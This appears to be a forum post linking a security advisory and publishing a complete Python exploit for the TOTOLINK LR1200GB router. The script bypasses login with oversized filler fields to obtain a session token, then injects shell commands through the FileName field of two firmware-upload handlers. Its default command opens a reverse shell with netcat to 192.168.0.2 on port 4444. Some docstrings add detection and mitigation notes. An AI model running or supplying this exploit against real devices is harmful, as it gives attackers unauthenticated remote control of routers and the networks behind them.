
Remote TOTOLINK LR1200GB AUTH BYPASS

varwar

Статья с деталями: https://ssd-disclosure.com/ssd-advisory-totolink-lr1200gb-auth-bypass/

Python:
#!/usr/bin/python3
import json
import argparse
import sys
import requests
from colorama import Fore, Style

# Fixed target endpoint. Note that -t/--host does NOT change where requests
# go: in main() it only fills the "http_host" JSON field sent by login_bypass().
URL = "http://192.168.0.1/cgi-bin/cstecgi.cgi"


def login_bypass():
    """Request a session token from the router's ``loginAuth`` handler.

    Reads the module-level ``username``, ``password`` and ``host`` values
    that ``main()`` assigns (their defaults are long filler strings), posts
    them to ``URL`` and returns the ``token`` field of the JSON reply.

    Returns:
        The token string when the reply contains a non-empty ``token``.

    Exits:
        ``sys.exit(0)`` when the reply has no token or is not valid JSON.
        Exit status 0 on failure is misleading for callers that check it.

    The mechanism that makes this succeed without valid credentials is
    described in the linked advisory; this function itself only sends the
    request and reads the token. The HTTP status is never checked, so a
    non-200 body is parsed like any other.

    Detection note: a ``loginAuth`` POST whose ``http_host`` field is
    hundreds of bytes long (the default here is 304 characters) does not
    resemble a browser login and is a usable signature at a proxy or in
    device HTTP logs, where request bodies are available.
    """
    login_bypass_payload = {
        "username": username,
        "password": password,
        "http_host": host,
        "verify": 0,
        "flag": 0,
        "topicurl": "loginAuth",
    }
    # One-second timeout; a slow or absent device raises a requests
    # exception here, which is not caught.
    response = requests.post(URL, json=login_bypass_payload, timeout=1)
    try:
        token = json.loads(response.text).get("token")
        if token:
            print(f"{Fore.BLUE}{Style.BRIGHT}[*]{Style.RESET_ALL} Token: {token}")
            return token
        else:
            print(
                f"{Fore.RED}{Style.BRIGHT}[-]{Style.RESET_ALL} Not able to get the token"
            )
            sys.exit(0)

    # `e` is bound but never used; the decode error itself is not reported.
    except json.JSONDecodeError as e:
        print(
            f"{Fore.RED}{Style.BRIGHT}[-]{Style.RESET_ALL} Not able to decode the json"
        )
        sys.exit(0)


def upload_firmware_file_rce():
    """Send the ``UploadFirmwareFile`` request carrying the module-level ``cmd``.

    ``cmd`` is set by ``main()`` from -c/--cmd. It is spliced, separated by
    ``;``, into the ``FileName`` field, so the field is evidently expected to
    reach a shell on the device (see the linked advisory for the details).
    The token comes from a fresh ``login_bypass()`` call. The response is
    discarded, so this function prints nothing about success or failure.

    This body is identical to ``set_upload_setting_rce`` apart from the
    ``topicurl`` value.

    Detection / mitigation note: a ``FileName`` value containing ``;`` in an
    ``UploadFirmwareFile`` request is not something a legitimate client
    produces; blocking management-interface access from untrusted networks
    and applying the vendor fix referenced in the advisory removes the
    exposure.
    """
    print(f"{Fore.BLUE}{Style.BRIGHT}[*]{Style.RESET_ALL} Executing command: {cmd}")
    filename = "File File;" + cmd + "; ls -al >"
    payload = {
        "FileName": filename,
        "FullName": "File",
        "ContentLength": "10000",
        "topicurl": "UploadFirmwareFile",
        "token": login_bypass(),
    }
    # Fire-and-forget: the return value is not inspected.
    requests.post(URL, json=payload, timeout=1)


def set_upload_setting_rce():
    """Send the ``setUploadSetting`` request carrying the module-level ``cmd``.

    Same construction as ``upload_firmware_file_rce``: ``cmd`` is joined with
    ``;`` into ``FileName``, the token is obtained by calling
    ``login_bypass()`` again, and the response is ignored. Only the
    ``topicurl`` differs; the two handlers presumably share the same
    vulnerable code path on the device (see the linked advisory).

    Detection note: the same ``;``-in-``FileName`` signature applies to
    ``setUploadSetting`` requests.
    """
    print(f"{Fore.BLUE}{Style.BRIGHT}[*]{Style.RESET_ALL} Executing command: {cmd}")
    filename = "File File;" + cmd + "; ls -al >"
    payload = {
        "FileName": filename,
        "FullName": "File",
        "ContentLength": "10000",
        "topicurl": "setUploadSetting",
        "token": login_bypass(),
    }
    # Fire-and-forget: the return value is not inspected.
    requests.post(URL, json=payload, timeout=1)


def main():
    """Parse the command line, set the module-level globals and dispatch.

    Options:
        -u/--username, -p/--password: values for the ``loginAuth`` request;
            default to 50 and 12 ``A`` characters respectively.
        -t/--host: value of the ``http_host`` JSON field only (see ``URL``);
            defaults to 304 ``A`` characters.
        -c/--cmd: string spliced into ``FileName`` by the two *_rce functions.
        -e/--exploit (required): name of the function to run.

    Dispatch uses ``globals().get(args.exploit)`` with only a ``callable``
    check, so ANY module-level callable is accepted, not just the three
    names listed in the help text (``main`` itself would recurse).
    """
    # The description string is a leftover placeholder and does not
    # describe this tool.
    parser = argparse.ArgumentParser(
        description="Command-line tool for a hypothetical application."
    )

    parser.add_argument(
        "-u", "--username", type=str, help="Username for authentication", required=False
    )
    parser.add_argument(
        "-p", "--password", type=str, help="Password for authentication", required=False
    )
    parser.add_argument(
        "-e",
        "--exploit",
        type=str,
        help="arguments can be login_bypass, set_upload_setting_rce, upload_firmware_file_rce",
        required=True,
    )
    parser.add_argument("-t", "--host", type=str, help="Host address", required=False)
    parser.add_argument(
        "-c", "--cmd", type=str, help="Command to execute", required=False
    )

    args = parser.parse_args()

    # The exploit functions read these as globals rather than taking
    # parameters, so they must be assigned before dispatch.
    global username, password, host, cmd

    # Long filler defaults; the advisory linked above explains their role
    # in the bypass -- confirm there before changing the lengths.
    username = args.username if args.username else "A" * 50
    password = args.password if args.password else "A" * 12
    host = args.host if args.host else "A" * 304
    cmd = args.cmd if args.cmd else "nc 192.168.0.2 4444 -e /bin/sh"

    # Name-based lookup in the module namespace; see docstring for the
    # consequence of the loose callable check.
    exploit = globals().get(args.exploit)
    if exploit and callable(exploit):
        exploit()
    else:
        print(
            f"{Fore.RED}{Style.BRIGHT}[-]{Style.RESET_ALL} Given exploit doesn't exist"
        )


# Script entry point; all argument handling and dispatch happens in main().
if __name__ == "__main__":
    main()
 

